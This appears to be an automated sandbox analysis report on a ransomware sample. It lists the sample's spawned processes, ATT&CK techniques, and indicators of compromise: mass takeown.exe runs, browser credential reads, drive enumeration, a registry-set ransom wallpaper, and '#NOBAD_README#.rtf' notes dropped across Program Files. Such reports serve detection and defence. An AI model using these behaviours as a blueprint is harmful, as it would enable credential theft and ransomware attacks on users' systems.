335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.execmd.exemVSen3Ss.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

pid	process
2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
1896	cmd.exe
2172	mVSen3Ss.exe
2508	cmd.exe
2636	cmd.exe
1952	cmd.exe
1580	cmd.exe
2644	cmd.exe
2100	cmd.exe
1648	cmd.exe
2468	cmd.exe
3056	cmd.exe
2156	cmd.exe
1516	cmd.exe
2692	cmd.exe
2728	cmd.exe
2568	cmd.exe
332	cmd.exe
1100	cmd.exe
2640	cmd.exe
2216	cmd.exe
2732	cmd.exe
4088	cmd.exe
1904	cmd.exe
3460	cmd.exe
3952	cmd.exe
3000	cmd.exe
2036	cmd.exe
3176	cmd.exe
2420	cmd.exe
2144	cmd.exe
2632	cmd.exe
2608	cmd.exe
3236	cmd.exe
588	cmd.exe
1624	cmd.exe
3208	cmd.exe
3408	cmd.exe
900	cmd.exe
3448	cmd.exe
1592	cmd.exe
3512	cmd.exe
3424	cmd.exe
2792	cmd.exe
3564	cmd.exe
1964	cmd.exe
1168	cmd.exe
2644	cmd.exe
1076	cmd.exe
1996	cmd.exe
2984	cmd.exe
2556	cmd.exe
2940	cmd.exe
2212	cmd.exe
2164	cmd.exe
3768	cmd.exe
3640	cmd.exe
3804	cmd.exe
3860	cmd.exe
1948	cmd.exe
3960	cmd.exe
2336	cmd.exe
1628	cmd.exe
1120	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
2276	takeown.exe
2216
816	takeown.exe
3848	takeown.exe
3808	takeown.exe
3200
2332	takeown.exe
2948	takeown.exe
2252
3232
1100
2160	takeown.exe
2744	takeown.exe
1632	takeown.exe
3632	takeown.exe
3092
2568
1828
3428
3452	takeown.exe
1152	takeown.exe
2188	takeown.exe
2252	takeown.exe
1064	takeown.exe
2388	takeown.exe
2316
2756	takeown.exe
3144	takeown.exe
3292	takeown.exe
1648
3748	takeown.exe
2660	takeown.exe
3740	takeown.exe
2956	takeown.exe
3604	takeown.exe
2316
1976	takeown.exe
3232
2920
2792	takeown.exe
3336
3300
3660	takeown.exe
3400	takeown.exe
1220
2876
1756
3436	takeown.exe
3304	takeown.exe
2744	takeown.exe
2164	takeown.exe
3708
3516
1144	takeown.exe
3948	takeown.exe
3848	takeown.exe
2708
1072
2728	takeown.exe
2480	takeown.exe
2884	takeown.exe
2224
3376
3584	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe	upx
behavioral5/memory/2172-2227-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1328-2557-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1676-2560-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1220-2588-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1016-2696-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2508-2943-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2508-2942-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2288-2979-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2288-3008-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2172-3130-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1864-3133-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1864-3132-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2384-3242-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1400-3314-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2580-3318-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1620-3376-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1632-3379-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2852-3382-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1020-3385-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1636-3392-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1636-3388-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2056-3439-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2056-3438-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2012-4906-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/836-5590-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1624-5824-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3040-5909-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3048-5952-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3028-5955-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2632-6359-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3276-6504-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3276-6425-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1792-7390-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4068-7395-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2524-7398-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1156-7399-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3212-7401-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4020-7404-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3184-7407-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3312-7409-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1012-7413-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2104-7414-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1332-7415-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2376-7417-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3404-7422-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3436-7423-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3524-7426-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3568-7428-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3588-7432-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1196-7435-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1196-7434-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2440-7437-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/752-7438-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1760-7441-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3668-7442-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3668-7443-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2948-7446-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1340-7448-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1064-7451-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2796-7453-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2796-7452-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2748-7459-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3672-7461-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 41 IoCs

Processes:

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Y3HLRHFA\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JQHF6B80\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\5B8DS9TT\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CJQLK5UF\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

mVSen3Ss64.exe335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

description	ioc	process
File opened (read-only)	\??\T:	mVSen3Ss64.exe
File opened (read-only)	\??\H:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\N:	mVSen3Ss64.exe
File opened (read-only)	\??\Q:	mVSen3Ss64.exe
File opened (read-only)	\??\X:	mVSen3Ss64.exe
File opened (read-only)	\??\Y:	mVSen3Ss64.exe
File opened (read-only)	\??\Z:	mVSen3Ss64.exe
File opened (read-only)	\??\X:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\O:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\S:	mVSen3Ss64.exe
File opened (read-only)	\??\E:	mVSen3Ss64.exe
File opened (read-only)	\??\H:	mVSen3Ss64.exe
File opened (read-only)	\??\T:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\I:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\B:	mVSen3Ss64.exe
File opened (read-only)	\??\M:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\V:	mVSen3Ss64.exe
File opened (read-only)	\??\Y:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\S:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\Q:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\E:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\O:	mVSen3Ss64.exe
File opened (read-only)	\??\P:	mVSen3Ss64.exe
File opened (read-only)	\??\G:	mVSen3Ss64.exe
File opened (read-only)	\??\I:	mVSen3Ss64.exe
File opened (read-only)	\??\J:	mVSen3Ss64.exe
File opened (read-only)	\??\W:	mVSen3Ss64.exe
File opened (read-only)	\??\V:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\R:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\G:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\N:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\J:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\L:	mVSen3Ss64.exe
File opened (read-only)	\??\M:	mVSen3Ss64.exe
File opened (read-only)	\??\U:	mVSen3Ss64.exe
File opened (read-only)	\??\W:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\U:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\P:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\A:	mVSen3Ss64.exe
File opened (read-only)	\??\K:	mVSen3Ss64.exe
File opened (read-only)	\??\R:	mVSen3Ss64.exe
File opened (read-only)	\??\Z:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\L:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\K:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\nOq0xSWV.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Cancun	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\main.css	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\uninstall.exe	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Antigua	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
